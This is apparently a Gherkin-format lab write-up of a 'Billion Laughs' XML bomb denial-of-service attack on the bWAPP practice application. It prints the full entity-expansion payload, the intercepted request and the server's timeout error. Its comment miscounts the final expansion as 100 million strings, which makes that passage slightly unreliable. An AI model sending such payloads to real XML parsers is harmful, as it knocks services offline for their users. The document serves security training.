# language: en

Feature: Denial Of Service (XML - Bomb)
  From system bWAPP
  From the A5 - Security Misconfiguration
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given the following in the url
  """
  URL: http://localhost/bWAPP/sm_dos_2.php
  Message: Denial of Service - (XML - Bomb)
  Details:
        - The Apache web server is vulnerable to XML DoS attacks!
        - A billion of laughs? Are you kiding?
        - Button called lol
  Objective: Launch a DoS attack
  """

Scenario: Denial Of Service (XML - Bobm)
  Given the web site
  When I click on Button labeled lol
  And I use Burp to check the request
  Then I see this xml code being sent:
  """
  # Burp Request on sm_dos_2.php which redirects too xxe-2.php
  POST /bWAPP/xxe-2.php HTTP/1.1
  Host: 192.168.56.101
  ...
  ...

  # This is the xml code being sent
  <?xml version="1.0" encoding="utf-8"?>
  <!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT login (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
  ]>
  <reset><login>&lol9;</login><secret>blah</secret></reset>
  """
  Then I inspect the code step by step to know what it does
  """
  # The core of the attack is the exponential entity expansion,
  # defined like this:
  <!ENTITY lol "lol">
  <!ELEMENT login (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">

  # So, when entity lol9 it's being parsed, it will start with the initial
  # entity, lol, which then is called in lol1 this &lol, will be replaced by the
  # initial single instance value of the entity named lol, so far
  # we get 10 lol's. e.g lollollollollollollollollollol
  # When it's done, lol2 entity will contain 10*10 = 100 "lol" strings
  # concatenated, following this definition, multiplicate each entity
  # by 10 till the last one:
  # Entity lol3: 10*10*10
  # ...
  # Entity lol8: 10*10*10*10*10*10*10*10 = 100,000,000
  #
  # At the end, there will 100,000,000 lol's strings concatenated,
  # which at parsing causes a denial of service due to the amount of data
  # being processed
  """
  Then I look at the response sent back from the server
  """
  # Response xxe-2.php
  HTTP/1.1 200 OK
  Date: Wed, 25 Jul 2018 00:29:03 GMT

  <br />
  <b>Fatal error</b>:  Maximum execution time of 30 seconds exceeded in \
  <b>/var/www/bWAPP/xxe-2.php</b> on line <b>40</b><br />
  """
